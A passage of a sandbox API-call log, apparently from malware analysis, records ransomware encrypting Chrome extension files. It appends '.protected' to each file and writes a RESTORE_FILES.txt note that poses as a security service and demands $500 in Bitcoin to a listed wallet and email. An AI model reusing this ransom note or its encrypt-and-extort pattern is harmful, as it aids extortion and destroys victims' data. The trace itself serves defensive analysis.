(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.566] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.566] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.566] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.566] CloseHandle (hObject=0x164) returned 1 [0081.566] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.566] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.566] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\RESTORE_FILES.txt") returned 156 [0081.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.566] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.566] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.567] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.567] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0081.567] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.567] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.568] CloseHandle (hObject=0x160) returned 1 [0081.568] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0081.568] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0081.568] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata") returned 139 [0081.568] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0081.568] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0081.568] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*") returned 141 [0081.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0081.568] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.568] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.568] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.568] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.568] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\.") returned 141 [0081.568] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.568] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.568] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.568] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.568] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.568] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.568] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\..") returned 142 [0081.568] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.568] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.568] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0081.568] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0081.569] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0081.569] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0081.569] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0081.569] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0081.569] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0081.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0081.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0081.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json") returned 162 [0081.569] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0081.569] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2686, lpOverlapped=0x0) returned 1 [0081.656] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd97a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.656] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2686, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2686, lpOverlapped=0x0) returned 1 [0081.656] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.656] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0081.656] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0081.656] CloseHandle (hObject=0x164) returned 1 [0081.656] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.protected") returned 172 [0081.656] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.protected")) returned 1 [0081.657] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0081.657] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0081.657] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0081.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0081.658] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.658] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0081.659] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.659] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0081.659] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.659] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0081.659] CloseHandle (hObject=0x160) returned 1 [0081.659] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0081.659] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0081.659] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\RESTORE_FILES.txt") returned 147 [0081.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0081.660] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.660] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0081.661] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.661] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0081.661] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.661] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0081.661] CloseHandle (hObject=0x15c) returned 1 [0081.662] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0081.662] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0081.663] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\RESTORE_FILES.txt") returned 141 [0081.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0081.663] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.663] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0081.664] lstrlenA 